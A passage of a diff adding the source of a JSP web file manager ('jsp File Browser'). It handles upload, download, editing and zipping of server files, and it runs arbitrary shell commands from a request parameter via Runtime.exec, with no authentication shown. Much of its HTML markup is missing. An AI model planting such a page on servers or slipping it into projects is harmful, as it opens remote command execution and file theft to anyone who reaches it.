"0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + 
line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if 
(skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != 
ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + 
//Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector 
expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." 
+ aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if 
(fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an 
exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if 
(RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) 
element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 
100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + 
} + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. 
" + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + 
while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println("" + conv2Html(entry.getName()) + + ""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". 
Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = 